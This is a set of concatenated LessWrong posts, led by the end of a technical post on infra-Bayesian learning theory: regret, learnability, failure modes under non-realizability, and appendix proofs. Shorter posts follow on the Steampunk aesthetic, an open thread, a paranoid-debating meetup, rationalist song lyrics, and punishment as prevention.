So the hypothesis class H itself is learnable, but the environment e that repeatedly produces false Morse-codes is not in H, so we have no guarantee that a Bayes-optimal policy of H would work well in e, and indeed, for certain priors over H, the Bayes-optimal policy will play the suboptimal action Y for most of its life when placed in environment e.
Can Solomonoff predict the even bits?
-------------------------------------
It seems that the previous example needed a contrived prior. Can similar anomalies occur with a more natural, Solomonoff prior? Intuitively it feels less likely: the hypotheses predicting Morse-codes warning of true consequences shouldn't have too big prior probabilities, and more importantly, it shouldn't have a bigger prior probability then them conveying exactly the wrong message: maybe you will get a reward of long string of 0s if you do the opposite of the message and play X!
Lattimore, Hutter and Gavane investigate a closely related question in their 2011 paper [Universal Prediction of Selected Bits](https://arxiv.org/abs/1107.5531). They take a simpler case than the one we looked at: The agent already knows that the environment is oblivious, it's a simple sequence prediction task. The agent starts with a Solomonoff prior over computable binary sequences, then it updates on the bits observed so far, and based on this, makes a prediction for the next bit in every step.
The sequence it observes has 0 on every even bit, however the odd bits follow an arbitrary pattern that's not even necessarily computable. Still, any human would figure out the simple rule about the even bits, so we would hope that Solomonoff induction, which is supposed to be the Idealized Sequence Predictor, can also do that.
Let pi be the probability the agent gives for bit 2i being 0 after it observed all the previous bits. Is it true, that for all sequences in which every even bit is 0,
limi→∞pi=1?I could have imagined the answer being "No": the even bits are always 0, while the odd bits always contain the Morse-code like "The bit 2n will be an exception!", always changing the prediction to a bigger n immediately after the last prediction failed. Maybe something like this could deceive the Solomonoff induction to occasionally, on these prophesied 2n bits, predict low probability for 0, in which case the limit wouldn't be 1.
Long story short, it follows as a special case from Theorem 10 of the paper that Solomonoff[[2]](#fn5s5jqffnbvu) can't be fooled like that, and it does in fact always give close to 1 probability of 0 on the even bits, given long enough time.
Okay, and what happens if the even bits are not deterministically 0, but have value 1 with probability 20%, and have value 0 with probability 80%, independently of each other and of the odd bits? Will pi converge to 80% with probability 1 for any given sequence on the odd bits?
The answer is that we don't know, this is a special case of Open Question 1 from the paper. My personal conjecture is yes, but it's probably hard to prove and remains a a gap in our knowledge about Solomonoff induction's performance in non-realizable settings.
Would an expected utility maximizer using Solomonoff induction also learn to always play X in the previous example? The example requires the agent to have non-oblivious environments in its hypothesis class, but there still shouldn't be traps according to any of its hypothesis, otherwise the class wouldn't be learnable. So we should restrict the Solomonoff prior to a set of interactive Turing machines that don't contain traps, for the question to make sense at all. I haven't thought deeply about what would be natural choices for such sets, and I remain genuinely unsure whether a Solomonoff based expected utility maximizer would learn to always play X in every oblivious environment. Hutter, Lattimore and Gavena's similar result indicates yes, but the possibility of large future rewards might make a big difference between interactive expected utility maximization and simple sequence prediction.
Infra-Bayesian learning theory
==============================
The creation of [infra-Bayesianism](https://www.lesswrong.com/posts/zB4f7QqKhBHa5b37a/introduction-to-the-infra-bayesianism-sequence) was motivated by these examples. When we are constructing a universal model of learning agents, it shouldn't be a hard theorem that it is able to learn that every second bit is 0. This should be obvious! After all, that's how humans learn about the world: we don't have a full probability distribution over how the world can be like to the atomic level, but we do learn a few regularities about our environment, like every time we touch the hot stove, it burns our hand. After we learn this law about the world, we might still have huge uncertainties about the rest of the universe, but we still stop touching that damn stove.
Motivated by this intuition, the hypothesis class of an IB learning agent is not made of environments, but laws. (Important note: laws were named belief functions in the original Infra-Bayesianism sequence, but were later renamed.) A law describes some regularities of the environment, while the agent can remain in Knightian uncertainty about everything else. For simplicity, we will focus on so-called crisp infra-POMDP laws, which is a general enough definition for our purposes now.
First, a quick notation:
**Notation 15** (□O).
*For a space*X*, the notation*□X*denotes the space of closed convex subsets of*ΔX*(the space of probability distributions over*X*).*
**Definiton 16** (Crisp infra-POMDP laws).
*A crisp infra-POMDP law*Θ*is specified by a space of states*S*, an initial state*s0∈S*, an observation function*b:S→O*and a transition kernel*T:S×A→□S*. The law is, that in every turn, the distribution of the next state must be in the closed convex set*T(s,a)∈□S*where*s*is the current state and*a*is the action of the agent that was taken just now. The agent can't observe which state it's in, but after every turn, it observes*b(s′)∈O*where*s′*is the current state at the end of the turn.*
From now on, whenever we write "law" we mean "crisp infra-POMDP law", at least in this post.
Given a law Θ, the agent tries to minimize its loss in the worst case scenario allowed by Θ. We personify the "worst case scenario" as the malevolent deity, Murphy. We assume that Murphy knows the policy π of our agent, and in every turn, chooses a distribution from T(s,a) in a way that maximizes the expected loss of the agent over its lifespan, given the agent's policy.
**Definiton 17** (Expected loss with respect to a law).
*Given an infra-POMDP law*Θ*,*
EΘ(π)(Lγ)=maxψE(π,ψ,Lγ)*where*ψ:S×V→T(s,a)⊂ΔS*is a counter-policy of Murphy to the the agent's*π*policy: Murphy can decide given the history so far and the state they are in, which distribution inside*T(s,a)*should the next state be sampled from. (*V=(A×O)∗×A*denotes the set of finite histories).*
So given a law Θ, our agents wants to choose the policy that minimizes this worst-case EΘ(π)(Lγ)
How does learning happen?
Analogously with the classical reinforcement learning agent, the infra-Bayesian RL agent also has a hypothesis class, but not made of environments but of laws. It aims to have a policy that has low infra-Bayesian regret with respect to every law in its hypothesis class.
**Definiton 18** (Regret in infra-Bayesianism).
*A policy*π*'s regret with respect to a law*Θ*, given the loss function*Lγ*is*
R(π,Θ,Lγ)=EΘ(π)(Lγ)−minπ∗EΘ(π∗)(Lγ)Analogously with the classical case, we can also define learnability:
**Definiton 19** (Infra-Bayesian learnability).
*A hypothesis class*H*is said to be learnable, if there exists family of policies*{πγ}*, such that for every law*Θ∈H*,*
limγ→1R(πγ,Θ,Lγ)=0.The analog of Theorem [4](#countable) applies to infra-Bayesian hypothesis classes too: if every finite subset of a countable H is learnable, then H itself is learnable. The proof is exactly the same.
Again, not every hypothesis class is learnable, because every environment is a law, so the previous counter-example with the two environments sending the agent to Heaven or Hell based on its first move is a good counter-example here too. But again, many natural hypothesis classes turn out to be learnable. And compared to classical learning theory, we can have more hope that a policy that has low regret with respect to some infra-Bayesian hypotheses, will behave reasonably in every environment. After all, if it's prepared to do well in a world governed by a malevolent deity, then a real environment shouldn't be worse.
To understand these concepts better, let's restrict our attention to a special type of laws: crisp infra-bandit laws.
**Definiton 20** (Infra-bandit).
*A crisp infra-bandit is a function*B:A→□O*.*
An example of crisp infra-bandit is: "If the agent takes action X, then the probability of of observation 1 in that turn is between 17% and 31%. If the agent takes action Y, then the probability of observation 2 and 3 are equal in that turn." We can check that in this example, B(X) and B(Y) are both closed convex sets of distributions.
Moreover, it's easy to see that every infra-bandit law is an infra-POMDP: Take an S such that b(s) is a bijection between S and O and let T(s,a)=B(a) for all s∈S and a∈A.
Given an infra-bandit law, the agent needs to prepare for the worst case scenario, that is, playing against Murphy, who is only constrained by the infra-bandit law.
After our agent plays action a, Murphy can choose a distribution from B(a) and then an observation is sampled from that distribution. The agent wants to choose a policy that keeps its loss low when playing against Murphy.
In the example above, if observation 1 implies a huge loss compared to 2 and 3, then the agent should take action X, because then Murphy will be constrained to pick a distribution in which the probability of 1 is at most 31%. On the other hand, if the agent took action Y, then Murphy would choose the distribution in which observation 1 has probability 1.
It's important to note that Murphy sees the full policy of the agent, so Murphy is not required to always shortsightedly choose the distribution that will cause the biggest expected loss in that particular turn: knowing the agent's learning algorithm, Murphy can choose not to cause maximal loss for some turns if it provokes the agent to learn a wrong lesson and start acting in a way such that Murphy will be able to cause him larger harm in the future. So the agent needs to prepare a policy that's not susceptible to this kind of deception.
**Theorem 21**. *A hypothesis class*H*made of infra-bandits is always learnable.*
*Proof.* Again, we only prove it for countable hypothesis classes, and because of the infra-Bayesian version of Theorem [4](#countable), it's equivalent to proving the learnability of finite H.
To have the regret bound going to 0 as γ goes to 1, it's enough to just always play the action that had the lowest average loss so far, and occasionally explore all the other other actions, with frequency decreasing to 0 but never disappearing. Call this policy π.
Given an infra-bandit B∈H, the best policy would be to always play the action a for which
ca=maxθ∈B(a)Eo∼θℓ(o,a) is minimal, that is, Murhpy can cause the smallest loss given this action. If we call π∗ the policy of always playing action a, then for every γ, the IB expected loss is
EB(π∗)(Lγ)=ca.On the other hand, for any ε>0, if the agent follows policy π and Murphy really is constrained by law B, then as γ→0, the agent will observe with probability approaching 1 that its average loss when playing action a is at most ca−ε. So whatever trick Murphy is playing, the action the agent is playing on its non-exploratory turns will always have an average loss so far at most ca−ε. If it was higher than that, the agent would just switch to playing action a. This means that as γ→1, the agent's average loss will be at most ca, so
limγ→1EB(π)(Lγ)=ca.This means that that
limγ→1R(π,B,Lγ)=0for every B∈H, so the hypothesis class is learnable. ◻
We could be interested not just in learnability, but in what regret bounds are achievable given a time discount rate γ or time horizon T. For this, we would need to find the optimal rate to decrease the frequency of exploratory steps. Vanessa investigated this in a yet-unpublished paper and got similar regret bounds to the ones we have for classical bandits. However, for this post, we don't inquire further than learnability, as the focus of the post is on how much we can prove behavioral guarantees for learning policies in general environments, and my current understanding is that the exact regret bounds don't matter for the examples this post will examine.
Infra-bandits was an easy-to-understand example for infra-Bayesian learnability, but Vanessa also proved a more general result:
**Theorem 22**. *A hypothesis class*H*made of finite-state, communicating crisp infra-POMDP laws is learnable.*
The definition of communicating is the same as before: for any two states, the agent has a policy which ensures that he will get from one state to the other with probability 1, no matter what Murphy is doing (within the bounds of the law).
Infra-Bayes-optimal policies
----------------------------
Before we move on to examples and counterexamples, we define a few more concepts analogous to the ones in classical theory.
**Definiton 23** (Bayesian regret in infra-Bayesianism).
*Given a prior distribution*ζ*on the hypothesis class*H*, the Bayesian regret of a policy*π*is*
EΘ∼ζR(π,Θ,Lγ).The analog of Lemma [12](#equivalence) is true in the infra-Bayesian setting too, with the exact same proof.
Also, analogously with the classical setting, we can look at the policy with the lowest Bayesian regret:
**Definiton 24** (Infra-Bayes-optimal policy).
*Given a hypothesis class*H*made of laws and given a prior distribution*ζ*over*H*, the policy*π*is said to be infra-Bayes-optimal if it minimizes*
EΘ∼ζEΘ(π)(Lγ)Theorem [14](#bayes-learns) is also true here, with the exact same proof: an infra-Bayes-optimal policy with a non-dogmatic prior over a learnable hypothesis class H will learn the class H.
Similarly to the classical case, infra-Bayes-optimal policies are more likely to behave reasonably in general environments, but unfortunately it's usually computationally intractable to find them, so we would prefer to prove guarantees about policies that are not required to be optimal, just to have low regret for every law in the class.
Non-realizability and infra-Bayesian learning theory
====================================================
So, how well does infra-Bayesianism do in general environments? Let's go through the previously listed examples.
The 010101... failure mode
--------------------------
We assume that the agent's hypothesis class consists of infra-bandits.
The agent's loss function is this: if its opponent plays action 1, he gets 10 loss, if the opponent plays action 0, he gets 0 loss. On top of that, if he plays action X, he gets 0 loss and if he plays action Y, he gets 1 loss.
The environment is oblivious, the observations don't depend on the agent's actions. So we would hope that the agent will learn almost never to play Y, which is a dominated action.
On the other hand, the agent can still have this the policy π below that contains a failure mode:
"Start with action Y, and play action Y as long as the observation history looks like 010101... After the first deviation from this sequence, take action X ever after."
Take an infra-bandit law Θ∈H.
R(π,Θ,Lγ)=EΘ(π)(Lγ)−minπ∗EΘ(π∗)(Lγ)where EΘ(π)(Lγ) is the expected loss if Murphy, knowing the agent's policy, chooses the distribution in every turn, constrained only by the law Θ, in a way that it maximizes the agent's overall expected loss through his life.
The infra-bandit law Θ assigns a closed convex set of probability distributions on the observations {0,1}. These distributions can be described with one variable p∈[0,1], the probability of observation 1, because then the probability of observation 0 is just 1−p. So a closed convex set of distributions is just [a,b]⊂[0,1] interval that determines that pmust be in [a,b].
If Θ(Y)=[a,b] then however Murphy chooses the distributions in each turn, by the 2nth turn, the 0101... failure mode history's probability will be at most bn(1−a)n. If b<99100, that is, at most 99100 is the maximum probability Murphy can assign to 1, then the failure mode history staying up for long is vanishingly unlikely, and the expected regret compared to the optimal policy of always playing X is at most
(1−γ)∞∑k=0(99100)k(γ2k+γ2k+1)=1−γ21−99100γ2which goes to 0 as γ goes to 1.
And if b>99100, then Murphy has no reason to try tricking the agent into losing 1 each turn by playing a suboptimal strategy at the price of Murphy being generous on every second turn: no, the loss is maximized when Murphy plays 1 with the maximal possible probability at every turn and makes the agent lose 10. So the failure mode in the policy doesn't affect EΘ(π)(Lγ) much, so π's regret will be low under every law in the hypothesis class, even though it's stupid.
The square-free failure mode
----------------------------
If we broaden the hypothesis class to finite-state communicating crisp infra-POMDPs, then there will be a simple law that predicts the 010101... sequence, so the agent can't have a failure mode on that sequence anymore. But no matter how broad hypothesis class we take, there will be sequences that are not directly encoded in any of the hypotheses, and the agent might be placed in an environment which produces that sequence. This is the core of the non-realizability problem.
Then, the agent will be unprepared to respond to this sequence: according to all its hypotheses, this sequence can only occur if Murphy has a very strong control over which bits should appear when. But then why wouldn't Murphy just use his control to make as many observations 1s as possible, instead of using its power to trick the agent into making suboptimal moves that are relatively harmless compared to observing more 1s?
Still, this is an improvement compared to performance guarantees provided by classical learning theory. For example, let's assume that the agent's hypothesis class is made of finite-state communicating crisp infra-POMDP laws, and it encounters the sequence that's 1 on square-free indices and 0 otherwise. This was our previous example that a classical learning agent with a hypothesis class made of finite-state POMDPs couldn't handle.
Fortunately, there is a law Θ that describes this sequence in a large part: "Every fourth and ninth bit must be 0, and Murphy is unconstrained on the other bits." This is a law that can be easily formalized as a finite-state communicating crisp infra-POMDP. If Θ is in the infra-Bayesian agent's hypothesis class, it is suddenly not allowed to have a failure mode where it plays action Y if it sees the sequence of square-free numbers: if the agent had this failure mode, then under law Θ, it would be worth it for Murphy to produce the square-free sequence, thus tricking the agent to play Y and lose 1 in every turn. The other option of Murphy would be to just play observation 1 on every index not divisible by 4 or 9 but this wouldn't be much better for him than playing 1 only on the square-free indices, the difference is just the 1−6π2−14−19+136=0.058 portion of bits, so the average loss 0.58 is smaller than the one Murphy can get by tricking the agent.
(Fun fact: the portion of [square-free](https://en.wikipedia.org/wiki/Square-free_integer) numbers from 1 to N goes to 6π2 as N goes to infinity.)
This means that if the agent has law Θ in its hypothesis class, then it must be prepared for this, which means it cannot have this exploitable failure mode.
How far does this logic go? If I understand correctly, this is the main hope of infra-Bayesian learning: that we can get a relatively narrow hypothesis class of laws that fits into the agent's head, but which is still broad enough that every environment we can expect the agent to encounter (what does that even mean?) is approximated well enough by one of the laws Θthat the agent can't have a failure mode in the sequence produced by the environment, because otherwise it would have non-negligible regret with respect to Θ (because if there was a failure mode for the sequence, it would be worth it to produce the sequence for Murphy constrained by Θ.)
Whether this is the case in real life (again, what does this really mean?) and whether we can formalize this further is an open question, but this is a promising direction.
Infra-Bayes-optimal policies might also be deceived by Morse-codes
------------------------------------------------------------------
Just as in the classical case, imagine that the agent has a contrived prior that gives high probability to laws in the form "Murphy is required to advertise in Morse-code that he will give lots of observations 0 after the 10nth term if I now play Y for a while, and then Murphy is required to keep its promise" but there aren't other laws in the hypothesis class that include constraints on Murphy that would require him to play Morse-codes (or these laws just have very low prior).
Then, after observing the Morse-codes, the agent will think "If Murphy is not required to do this, then the only way he can create such a sequence is by having strong control over the bits, but then why wouldn't he use that to just show a lot of 1s? The only way this makes sense is under the hypothesis that Murphy is required to do this, in which case I should play Y, because then Murphy will be required to play a long string of 0s in the future."
If we define a Solomonoff-style simplicity prior over infra-Bayesian laws, this more natural prior might get rid of this problem. But it might get rid of the problem in classical learning theory too (in fact, we know that it can predict the even bits), and I feel that the two problems are actually very similar, although the reasoning in the previous section might give us more hope in the infra-Bayesian case.
A day in the life of an IB agent
--------------------------------
The original intent of infra-Bayesian learning was that the agent doesn't need to learn every detail about its full environment to understand a simple law of nature, like that the hot stove burns his hands, so he should stop touching it.
Instead, what we got is this weird decision mechanism:
"I learned that the hot stove always burns my hand. Today it's raining outside and I just stubbed my toe, so everything in the environment that I don't have a model about is very bad, which matches my expectations that an evil deity controls the universe."
"Oh weird, the rain just stopped. Aha, I see, this is just the evil deity trying to confuse me and trick me into touching the stove. But I'm not falling for this!"
"Oh, I just found a shiny coin in my pocket. This is really unexpected, as the sunshine and the coin together are worth more for me than not burning my hand, so it can't just be for tricking me. I don't understand why and evil god would let so good things happen to a person, and I'm really confused and don't have a plan for this unlikely situation. I might as well celebrate by touching the hot stove."
This story is somewhat unfair, because this problem only occurs if enough good things happen to the agent that are not explained by any of the laws in it hypothesis class: as we have seen with the square-free example, if the agent knows a law that can model most of the good things happening, then the agent will just conclude that Murphy is mostly constrained by this law, and the little additional goodness not explained by the law is just for tricking it to touch the stove, which dissolves the agent's confusion, and saves it from burning its hand. However it's still unclear what would be a good hypothesis class of laws that can explain every good event with close enough approximation.
A proposed solution
-------------------
The best idea I heard for getting a simple hypothesis class for solving this problem is a class of laws in this form: "The hot stove always burns my hand anytime I touch it. The not stove-related event in the world on average cause at most loss c to me." Having laws like this for a lot a of different values of c seems like it could solve the problem: if unmodeled things are not going the worst possible way, then the agent doesn't get confused, but thinks that the law requires Murphy to constrain its evilness in general.
Unfortunately, I don't believe there is such a simple way out. How would we define in a law that "I get on average at most c loss"? Average on which time frame?
We can indeed make laws specifying concrete, finite time-frames, like "In every 100 turn, there must be at least 35 positive observations". But then the agent might just get into an environment in which longer and longer strings of 0s and 1s follow each other, which falsifies all these laws, in which case we are back to the point where nothing is holding back the agent from touching the stove.
The other possibility would be a law saying that throughout the agent's whole life, the overall loss must be at most c, calculated with γ time discount rate.
Unfortunately, you can't define a law like that. Laws are not supposed to include γ, which is a moving variable, it being encoded in the hypotheses would break the definition of learnability.
Let's take an example what could happen if we allowed laws including γ:
"The law is that a stove can only burn you at most 12(1−γ) times, after that it will turn things to gold."
How can an agent with γ time discount (this is similar to having a lifespan of 11−γ turns) supposed to test this hypothesis? It can only do so by spending half its life touching hot stoves. If the hypothesis was false, this is a pretty bad deal. On the other hand, if it was right, then not trying it would mean missing out on giant heaps of gold.
If the law specified 10000 instead of 12(1−γ) turns, then as γ goes to 1, the hypothesis would be testable, which could make the hypothesis class containing it learnable. But if we allowed incorporating γ in the hypotheses themselves, learnability breaks down.
I don't see a third way how a law of "average c loss" could be implemented, so while I still think it's an interesting idea to be potentially used later, it doesn't solve the problem in itself.
Conclusion
==========
Infra-Bayesianism is better equipped than classical learning theory in providing provable performance guarantees in general environments, but it still probably needs a very broad hypothesis class of very detailed laws that can describe the world in close-enough detail that the agent doesn't get confused when good things are happening, and provably avoids failure modes in those cases. I don't have a clear idea of exactly how all-encompassing these laws would need to be, but it's at least some improvement over classical learning theory that only functions well if the environment's full model is included in the hypothesis class. I think the natural next step would be to describe better what kind of hypothesis class of laws is detailed enough the give good performance guarantees, but still realistic to fit into the head of an agent smaller than the environment. I feel skeptical about getting meaningful results to this question, as I believe that the word "realistic" hides a lot here and my suspicion is that our theorizing is not really useful to tackle that. But this topic belongs to my [other post](https://www.lesswrong.com/posts/StkjjQyKwg7hZjcGB/a-mostly-critical-review-of-infra-bayesianism).
Appendix: Technical proofs
==========================
**Theorem 4**.
*If every finite subset of the countable hypothesis class*H*is learnable, then*H*itself is learnable.*
*Proof.* As H is countable, we can order its elements. Let Hn denote the set first n elements of H. As every Hn is a learnable hypothesis class, there exists a corresponding {πγn} family of policies for all n.
Let f:(0,1)→Z+ be the function such that f(γ) is defined as the biggest number n such that
ER(πγn,e,Lγ)<1n for every e∈Hn.
If no such n exists, then let f(γ)=1. If all positive integers n satisfy the condition, that let f(γ)=⌊11−γ⌋.
We prove by contradiction that f(γ) goes to infinity as γ goes to 1. Assume that it's not the case: there is an M such that there is a sequence of values γi→1 such that f(γi)<M. This would mean that for all i, there exists an ei∈HM, such that ER(πγiM,ei,Lγi)≥1M. As there are only finitely many environments in HM, there must be one that that appears infinitely many times in the ei sequence. Then this environment e would contradict the definition of HM's learnablility, as
limγ→1ER(πγM,e,Lγ)=0would not hold. Contradiction.
We can now construct a family of policies {πγ} that learns the whole class H:
πγ=πγf(γ).For every environment eM∈H and ε>0, there exists a point r∈(0,1) such that f(γ)>max{M,1ε} for γ>r. This means that for γ>r, we get
ER(πγf(γ),eM,Lγ)<εbecause eM∈Hf(γ) and 1f(γ)<ε.
Thus, we proved for all e∈H that
limγ→1ER(πγ,e,Lγ)=0. ◻
**Theorem 12**.
*Given a countable hypothesis class*H*and a non-dogmatic prior*ζ*on*H*(non-dogmatic meaning that*ζ(h)>0*for all*h∈H*), and a family of policies*πγ*, then*
limγ→1Ee∼ζER(πγ,e,Lγ)=0*is equivalent to*
limγ→1ER(πγ,e,Lγ)=0∀e∈H,*that is, the class*H*being learnable and*π*being a good learning algorithm.*
*Proof.* Suppose that
limγ→1Ee∼ζER(πγ,e,Lγ)=0.For any hypothesis e∈H,
ER(πγ,e,Lγ)≤1ζ(e)Ee∼ζER(πγ,e,Lγ),so as the latter goes to 0, the former goes to 0 too, because we had the condition that ζ(e)>0.
Now let's suppose that
limγ→1ER(πγ,e,Lγ)=0∀e∈H.As the loss acquirable in one turn is bounded by b, the overall loss with discount rate γ is at most (1−γ)∑∞k=0bγk=b. This means that for every policy and environment, R(πγ,e,Lγ)≤b.
Let H={e1,e2,…}. Because ∑∞i=1ζ(ei)=1, for every ε>0 there exists an N such that if ∑∞i=N+1ζ(ei)<ε2b.
For the first N (finitely many!) hypotheses there exists a δ that if γ>1−δ, then
ER(πγ,ei,Lγ)<ε2∀1≤i≤N.So for any ε>0 there exists a δ such that if γ>1−δ, then
Ee∼ζER(πγ,e,Lγ)=N∑i=1ζ(ei)ER(πγ,ei,Lγ)+∞∑i=N+1ζ(ei)ER(πγ,ei,Lγ)≤ε2+ε2bb=εWith this we proved that
limγ→1Ee∼ζER(πγ,e,Lγ)=0. ◻
**Theorem 14**.
*Given a learnable, countable hypothesis class*H*and a non-dogmatic prior*ζ*on*H*, if we take the Bayes-optimal policy*πγ*for every*γ∈(0,1)*, then this family of policies learn the hypothesis class*H*.* :::
*Proof.* Because H is learnable, there exists a family of policies {πγ∗} such that
limγ→1ER(πγ∗,e,Lγ)=0∀e∈H.By Theorem [12](#equivalence), this is equivalent to
limγ→1Ee∼ζER(πγ∗,e,Lγ)=0.πγ is the Bayes-optimal policy for every γ∈(0,1), given the prior ζ, in particular, it accumulates at most as much loss in expectation as πγ∗. Thus,
limγ→1Ee∼ζER(πγ∗,e,Lγ)=0.By Theorem [12](#equivalence), this is equivalent to
limγ→1ER(πγ,e,Lγ)=0∀e∈H.Thus, the Bayes-optimal family of policies {πγ} learns the hypothesis class H. ◻
1. **[^](#fnreftvwwxz1dies)**See "Reinforcement learning in POMDPs without resets" (Even-dar at al 2005), theorem 4.1.
2. **[^](#fnref5s5jqffnbvu)**A normalized version of Solomonoff, to be more precise. |
f21ba697-4c34-4aad-a865-e344ac9c051b | trentmkelly/LessWrong-43k | LessWrong | The Steampunk Aesthetic
Epistemic Status: Poetry. More confident about Linux than I have a right to be.
Last year, some friends wanted to buy a boat to live on, because the Bay Area is hella expensive. They acquired a tugboat, in Alaska. I was among a few people who helped them pilot it south.
I currently do not have enough information to know whether the boat turned out to be a good idea, but in the meanwhile I gained what you might call (if you'll pardon the phrase) an intuitive, gears level understanding* of the Steampunk Aesthetic.
(My dad tried to teach me this when I was little. Sorry I didn't get it at the time, Dad)
i. Aesthetics of Abstraction
The Apple Aesthetic is clean, smooth, and magical.
You hold a glowing rectangle in your hand, formed as solid and opaque as the monolith from 2001: A Space Odyssey. You touch the rectangle, and things happen. You can learn to communicate with a little homunculus inside named Siri and ask her for favors, and if you phrase the words just right, perhaps she might grant your wish.
The rectangle has secrets, but you are not meant to pry into them too deeply, and if you try, forces from beyond will thwart you in ways subtle and unsubtle.
If your rectangle breaks, you cannot fix it. You must take it to the Apple Priests in their white halls of power, lit by shining icons. They will secret your rectangle away, work their arcane power on it and return it to you (or perhaps leave you another rectangle in its place).
The Linux Aesthetic is magical too, but of a different sort.
There are arcane languages you can learn, but they do not hold your hand. You either know the words of power, or you do not. Most ways of speaking the words of power are so wrong that nothing happens. Worse is to be almost right, and yet so wrong that you undo entire chapters of you life.
You may borrow scrolls from wizards more powerful than you, but god help you if you speak their words without understanding what exactly they mean. Read one scroll blindly, and fate m |
1bae99bc-f607-4313-a9d9-aeae14c40a45 | trentmkelly/LessWrong-43k | LessWrong | Open thread, September 22-28, 2014
If it's worth saying, but not worth its own post (even in Discussion), then it goes here.
Notes for future OT posters:
1. Please add the 'open_thread' tag.
2. Check if there is an active Open Thread before posting a new one. (Immediately before; refresh the list-of-threads page before posting.)
3. Open Threads should be posted in Discussion, and not Main.
4. Open Threads should start on Monday, and end on Sunday. |
54c865ac-62fa-484d-9229-20d901c04a52 | StampyAI/alignment-research-dataset/blogs | Blogs | New report: “Non-omniscience, probabilistic inference, and metamathematics”
[](https://intelligence.org/files/Non-Omniscience.pdf)UC Berkeley student and MIRI research associate Paul Christiano has released a new report: “[Non-omniscience, probabilistic inference, and metamathematics](https://intelligence.org/files/Non-Omniscience.pdf).”
Abstract:
> We suggest a tractable algorithm for assigning probabilities to sentences of first-order logic and updating those probabilities on the basis of observations. The core technical difficulty is relaxing the constraints of logical consistency in a way that is appropriate for bounded reasoners, without sacrificing the ability to make useful logical inferences or update correctly on evidence.
>
>
> Using this framework, we discuss formalizations of some issues in the epistemology of mathematics. We show how mathematical theories can be understood as latent structure constraining physical observations, and consequently how realistic observations can provide evidence about abstract mathematical facts. We also discuss the relevance of these ideas to general intelligence.
>
>
What is the relation between this new report and Christiano et al.’s earlier “[Definability of truth in probabilistic logic](https://intelligence.org/files/DefinabilityTruthDraft.pdf)” report, discussed by John Baez [here](http://johncarlosbaez.wordpress.com/2013/03/31/probability-theory-and-the-undefinability-of-truth/)? In this new report, Paul aims to take a broader look at the interaction between probabilistic reasoning and epistemological issues, from an algorithmic perspective, before continuing to think about reflection and truth in particular.
The post [New report: “Non-omniscience, probabilistic inference, and metamathematics”](https://intelligence.org/2014/06/23/new-report-non-omniscience-probabilistic-inference-metamathematics/) appeared first on [Machine Intelligence Research Institute](https://intelligence.org). |
5885f147-b9cc-4416-a6cb-93e73fbe5496 | trentmkelly/LessWrong-43k | LessWrong | Meetup report: London LW paranoid debating session
A photo from a (different) recent LW London meetup
Cross-posted from my blog.
I wasn't going to bother writing this up, but then I remembered it's important to publish negative results.
LessWrong London played a few rounds of paranoid debating at our meetup on 02/02/14. I'm not sure we got too much from the experience, except that it was fun. (I enjoyed it, at any rate.)
There were nine of us, which was unwieldy, so we split into two groups. Our first questions probably weren't very good: we wanted the height of the third-highest mountain in the world, and the length of the third-longest river. (The groups had different questions so that someone on the other group could verify that the answer was well-defined and easy to discover. I had intended to ask "tallness of the third-tallest mountain", but the wikipedia page I found sorted by height, so I went with that.)
I was on the "river" question, and we did pretty badly. None of us really knew what ballpark we were searching in. I made the mistake of saying an actual number that was in my head but I didn't know where from and I didn't trust it, that the longest river was something like 1,800 miles long. Despite my unconfidence, we became anchored there. Someone else suggested that the thing to do would be to take a quarter of the circumference of earth (which comes to 6,200 miles) as a baseline and adjust for the fact that rivers wiggle. I thought, that's crazy, you must be the mole. I think I answered 1500 miles.
In reality, the longest river is 4,100 miles, the third longest is 3900 miles, and the mole decided that 1800 was dumb and he didn't need to do anything to sabotage us. (I don't remember what the circumference-over-four person submitted. I have a recollection that he was closer than I was, but I also had a recollection that circumference-over-four was actually pretty close, which it isn't especially.)
The other team did considerably better, getting answers in the 8,000s for a true answer of 8,600.
I' |
5eeb9a7e-8d49-4f43-a06d-966848f6d8f2 | trentmkelly/LessWrong-43k | LessWrong | Rational Humanist Music
Something that's bothered me a lot lately is a lack of good music that evokes the kind of emotion that spiritually-inspired music does, but whose subject matter is something I actually believe in. Most songs that attempt to do this suffer from "too literal syndrome," wordily talking about science and rationality as if they're forming an argument, rather that simply creating poetic imagery.
I've only found two songs that come close to being the specific thing I'm looking for:
Word of God
Singularity
(Highly recommend good headphones/speakers for the Singularity one - there's some subtle ambient stuff that really sells the final parts that's less effective with mediocre sound)
Over the past few months I've been working on a rational humanist song. I consider myself a reasonably competent amateur songwriter when it comes to lyrics, not so much when it comes to instrumental composition. I was waiting to post something when I had an actual final version worth listening to, but it's been a month and I'm not sure how to get good instrumentation to go along with it and I'm just in the mood to share the lyrics. I'd appreciate both comments on the song, as well as recommendations for good, similar music that already exists. And if someone likes it enough to try putting it to the music, that'd be awesome.
Brighter than Today
Many winter nights ago
A woman shivered in the cold
Stared at the sky and wondered why the gods invented pain.
She bitterly struck rock together
Wishing that her life was better
Suddenly she saw the spark of light and golden flame.
She showed the others, but they told her
She was not meant to control
The primal forces that the gods had cloaked in mystery.
But proud and angry, she defied them
She would not be satisfied.
She lit a fire and set in motion human history.
Tomorrow can be brighter than today,
Although the night is cold
And the stars may feel so very far away
Oh....
But every mind can be a golden ray
Of courag |
91335557-31fa-4f1c-a57c-69e145495546 | trentmkelly/LessWrong-43k | LessWrong | Analyzing Punishment as Preventation
Continued from https://www.lesswrong.com/posts/NvNmDWEpr8FSicgYN/reasons-for-punishment
In the previous post we listed a number of reasons given for punishing people. The first was as preventation.
> In some cases punishment can prevent the person being able to commit the crime in the future. For example it's much more difficult to commit certain crimes in prison. This is relevant if you believe people who commit such crimes once are more likely to do it again.
In this post I would like to analyze this from a game theoretic perspective.
Preventative Policies
There are actions that we do not want people to do (crimes), and there are policies we can take to reduce the chance of anyone being able to commit those crimes.
For example we don't want people to murder other people. In order to reduce the chance of murder, we could ban guns, and we could also ban all sharp implements.
However such policies have costs. If you ban guns people will find protecting themselves from bears harder. If you ban sharp implements people will find cooking a real challenge.
So in order to weigh up whether or not to impose some policy to reduce a crime, we have to consider (possible units in brackets):
1. The prior likelihood of the crime (average cases per person per year).
2. The damage caused by the crime if it occurs (per instance).
3. The amount the policy will reduce the likelihood of the crime (average cases per person per year).
4. The cost of the policy (per person per year).
If (cost of the policy) < (reduction in likelihood of crime) * (damage caused by crime) then the policy is worth implementing.
For a given crime different policies will come out differently from this calculation. Hence why some countries ban guns, but none that I know of ban sharp implements.
This assumes we can only apply the policy on a blanket level. But these factors are different for every individual. Some people are more likely to commit crimes, some people will suffer more from the poli |
